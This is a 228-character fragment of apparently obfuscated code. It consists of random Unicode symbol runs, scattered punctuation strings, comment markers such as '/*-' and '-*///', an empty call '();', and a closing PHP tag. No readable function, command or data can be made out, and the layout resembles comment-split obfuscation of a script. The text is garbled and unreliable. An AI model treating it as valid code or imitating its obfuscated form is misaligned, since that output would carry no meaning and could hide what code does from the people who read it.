⋚⒞◴➯▥ⓚ⊅❸♒⋸ↈ◡

uMB|}2R}Q⋚⒞◴➯▥ⓚ⊅❸♒⋸ↈ◡

-*///
dPV/*-
↣⇡｀−㊘☄≫◲▍✩↨∵◙☶↚↸↛□✧⋚⓲ⅻ
zL&vz↣⇡｀−㊘☄≫◲▍✩↨∵◙☶↚↸↛□✧⋚⓲ⅻ
-*///
::/*-mm9Qv-*///
ylrxi/*-


Ⅻ✈╁◯┰❇✞➭}﹉Ⅶ☼╆⊩➬◽


!{ISⅫ✈╁◯┰❇✞➭}﹉Ⅶ☼╆⊩➬◽


-*///
();/*-


⓱⅖┭▹➺≱Ⅸ


K;9^>!w(⓱⅖┭▹➺≱Ⅸ


-*///
 ?>